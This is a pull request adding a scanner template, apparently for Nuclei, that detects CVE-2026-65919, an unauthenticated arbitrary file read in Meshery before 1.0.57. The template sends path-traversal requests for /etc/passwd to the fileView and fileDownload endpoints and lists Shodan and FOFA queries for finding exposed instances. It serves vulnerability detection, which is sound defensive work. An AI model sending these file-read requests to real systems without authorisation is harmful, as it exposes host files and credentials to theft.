### PR TITLE
Add CVE-2026-65919: Meshery <1.0.57 unauthenticated arbitrary file read

### DIFF
--- a/http/cves/2026/CVE-2026-65919.yaml
+++ b/http/cves/2026/CVE-2026-65919.yaml
@@ -5,13 +5,10 @@ info:
   author: str4k3r
   severity: high
   description: |
-    Meshery before 1.0.57 contains an unauthenticated arbitrary file read
-    vulnerability in the /api/system/fileView and /api/system/fileDownload
-    endpoints. Both handlers pass the user-supplied `file` query parameter
-    directly to os.Open without any path validation, allowing a remote,
-    unauthenticated attacker to read arbitrary files from the server
-    filesystem (e.g. /etc/passwd). Fixed in 1.0.57 by SafeFilePath(), which
-    rejects traversal sequences and restricts reads to allowlisted directories.
+    Meshery before 1.0.57 contains an unauthenticated arbitrary file read vulnerability in the /api/system/fileView and /api/system/fileDownload endpoints that pass user-supplied file parameters directly to os.Open without path validation. Attackers can supply absolute paths or traversal sequences in the file parameter to read arbitrary files from the host filesystem without authentication.
+  impact: |
+    Unauthenticated attackers can read arbitrary files on the host, potentially exposing sensitive information.
+  remediation: Upgrade to version 1.0.57 or later.
   reference:
     - https://github.com/meshery/meshery/issues/20076
     - https://github.com/meshery/meshery/pull/20133
@@ -26,11 +23,11 @@ info:
   metadata:
     verified: true
     max-request: 2
-    shodan-query: http.title:"Meshery"
     product: meshery
     vendor: meshery
     fofa-query: title="Meshery"
-  tags: cve,cve2026,meshery,lfi,fileread,traversal,unauth
+    shodan-query: http.title:"Meshery"
+  tags: cve,cve2026,meshery,lfi,traversal,unauth,oss
 
 http:
   - method: GET

--- a/http/cves/2026/CVE-2026-65919.yaml
+++ b/http/cves/2026/CVE-2026-65919.yaml
@@ -22,15 +22,36 @@ info:
     cwe-id: CWE-22
   metadata:
     verified: true
-    max-request: 2
+    max-request: 3
     product: meshery
     vendor: meshery
     fofa-query: title="Meshery"
     shodan-query: http.title:"Meshery"
   tags: cve,cve2026,meshery,lfi,traversal,unauth,oss
 
+flow: http("detect") && http("exploit")
+
 http:
-  - method: GET
+  - id: detect
+    method: GET
+    path:
+      - "{{BaseURL}}"
+
+    host-redirects: true
+    max-redirects: 2
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Meshery"
+          - "assetPrefix"
+        condition: and
+        internal: true
+        case-insensitive: true
+
+  - id: exploit
+    method: GET
     path:
       - "{{BaseURL}}/api/system/fileView?file=/etc/passwd"
       - "{{BaseURL}}/api/system/fileDownload?file=/etc/passwd"

--- a/http/cves/2026/CVE-2026-65919.yaml
+++ b/http/cves/2026/CVE-2026-65919.yaml
@@ -1,14 +1,15 @@
 id: CVE-2026-65919
 
 info:
-  name: Meshery <1.0.57 - Unauthenticated Arbitrary File Read
+  name: Meshery <1.0.57 - Arbitrary File Read
   author: str4k3r
   severity: high
   description: |
     Meshery before 1.0.57 contains an unauthenticated arbitrary file read vulnerability in the /api/system/fileView and /api/system/fileDownload endpoints that pass user-supplied file parameters directly to os.Open without path validation. Attackers can supply absolute paths or traversal sequences in the file parameter to read arbitrary files from the host filesystem without authentication.
   impact: |
     Unauthenticated attackers can read arbitrary files on the host, potentially exposing sensitive information.
-  remediation: Upgrade to version 1.0.57 or later.
+  remediation: |
+    Upgrade to version 1.0.57 or later.
   reference:
     - https://github.com/meshery/meshery/issues/20076
     - https://github.com/meshery/meshery/pull/20133
@@ -27,7 +28,7 @@ info:
     vendor: meshery
     fofa-query: title="Meshery"
     shodan-query: http.title:"Meshery"
-  tags: cve,cve2026,meshery,lfi,traversal,unauth,oss
+  tags: cve,cve2026,meshery,lfi,traversal,oss
 
 flow: http("detect") && http("exploit")
 

--- a/http/cves/2026/CVE-2026-65919.yaml
+++ b/http/cves/2026/CVE-2026-65919.yaml
@@ -1,0 +1,52 @@
+id: CVE-2026-65919
+
+info:
+  name: Meshery <1.0.57 - Unauthenticated Arbitrary File Read
+  author: str4k3r
+  severity: high
+  description: |
+    Meshery before 1.0.57 contains an unauthenticated arbitrary file read
+    vulnerability in the /api/system/fileView and /api/system/fileDownload
+    endpoints. Both handlers pass the user-supplied `file` query parameter
+    directly to os.Open without any path validation, allowing a remote,
+    unauthenticated attacker to read arbitrary files from the server
+    filesystem (e.g. /etc/passwd). Fixed in 1.0.57 by SafeFilePath(), which
+    rejects traversal sequences and restricts reads to allowlisted directories.
+  reference:
+    - https://github.com/meshery/meshery/issues/20076
+    - https://github.com/meshery/meshery/pull/20133
+    - https://github.com/meshery/meshery/commit/ea83a26cb090b13be36c07cf24a99f8c637cc765
+    - https://www.vulncheck.com/advisories/meshery-unauthenticated-arbitrary-file-read-via-fileview-and-filedownload
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-65919
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2026-65919
+    cwe-id: CWE-22
+  metadata:
+    verified: true
+    max-request: 2
+    shodan-query: http.title:"Meshery"
+    product: meshery
+    vendor: meshery
+    fofa-query: title="Meshery"
+  tags: cve,cve2026,meshery,lfi,fileread,traversal,unauth
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/system/fileView?file=/etc/passwd"
+      - "{{BaseURL}}/api/system/fileDownload?file=/etc/passwd"
+
+    stop-at-first-match: true
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
## CVE-2026-65919 — Meshery unauthenticated arbitrary file read

Meshery before 1.0.57 exposes `/api/system/fileView` and `/api/system/fileDownload`, which pass the user-supplied `file` query parameter directly to `os.Open` with no path validation. A remote, unauthenticated attacker can read arbitrary files from the server filesystem.

**Oracle:** `GET /api/system/fileView?file=/etc/passwd` → 200 with `root:...:0:0:` on vulnerable; fixed builds return 400 `Unsafe file path requested`.

**Verified** on official images (default config, zero setup):
- Vulnerable `meshery/meshery:stable-v1.0.56` → DETECTED (3/3)
- Fixed `meshery/meshery:stable-v1.0.57` → NOT DETECTED (3/3)

**References**
- https://github.com/meshery/meshery/issues/20076
- https://github.com/meshery/meshery/pull/20133
- https://github.com/meshery/meshery/commit/ea83a26cb090b13be36c07cf24a99f8c637cc765
- https://www.vulncheck.com/advisories/meshery-unauthenticated-arbitrary-file-read-via-fileview-and-filedownload
- https://nvd.nist.gov/vuln/detail/CVE-2026-65919

CWE-22 · CVSS 3.1 7.5 (High)